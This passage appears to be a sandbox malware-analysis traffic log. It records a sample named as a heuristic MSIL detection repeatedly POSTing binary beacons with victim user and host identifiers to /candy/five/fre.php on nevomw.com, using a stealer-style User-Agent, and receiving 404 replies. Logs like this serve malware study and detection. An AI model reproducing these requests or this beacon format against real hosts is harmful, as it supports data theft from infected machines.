                                            Dec 2, 2020 11:53:54.026077032 CET1530INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            154192.168.2.64990245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:54.292505026 CET1539OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:54.353563070 CET1540OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:54.429546118 CET1540INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            155192.168.2.64990345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:54.722059965 CET1541OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:54.774919033 CET1541OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:54.853921890 CET1542INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            156192.168.2.64990445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:55.140343904 CET1542OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:55.192606926 CET1543OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:55.270211935 CET1543INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            157192.168.2.64990545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:55.522610903 CET1544OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:55.577641964 CET1544OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:55.652744055 CET1545INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            158192.168.2.64990645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:55.936892986 CET1545OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:55.989226103 CET1546OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:56.061289072 CET1546INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            159192.168.2.64990745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:56.339313030 CET1547OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:56.391856909 CET1547OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:56.464035988 CET1547INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            16192.168.2.64972945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:49.753380060 CET93OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:49.806524038 CET94OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:49.881766081 CET94INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:49 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            160192.168.2.64990845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:56.737421036 CET1548OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:56.790050983 CET1549OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:56.865797043 CET1549INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:56 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            161192.168.2.64990945.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:57.123188019 CET1550OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:57.175045967 CET1550OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:57.270092964 CET1550INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            162192.168.2.64991045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:57.538551092 CET1551OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:57.592422962 CET1552OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:57.668447018 CET1552INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            163192.168.2.64991145.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:57.975991011 CET1553OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:58.028104067 CET1553OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:58.112591982 CET1553INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            164192.168.2.64991245.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:58.357650042 CET1554OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:58.410573959 CET1554OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:58.484031916 CET1555INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            165192.168.2.64991345.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:58.743469954 CET1556OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:58.796829939 CET1556OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:58.873219013 CET1556INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:58 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            166192.168.2.64991445.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:59.169840097 CET1557OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:59.226135969 CET1557OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:59.308444023 CET1558INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            167192.168.2.64991545.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:53:59.598388910 CET1559OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:53:59.652334929 CET1559OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:53:59.725656033 CET1559INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:53:59 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            168192.168.2.64991645.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:00.003773928 CET1560OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:00.057231903 CET1560OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:00.132744074 CET1561INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            169192.168.2.64991745.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:00.415813923 CET1562OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:00.471972942 CET1562OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:00.545377016 CET1562INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:00 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            17192.168.2.64973045.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:52:50.187410116 CET95OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:50.239814043 CET95OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:50.313590050 CET95INHTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:50 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            170192.168.2.64991845.144.3.23480C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            TimestampkBytes transferredDirectionData
                                            Dec 2, 2020 11:54:00.838684082 CET1563OUTPOST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:00.891263962 CET1563OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
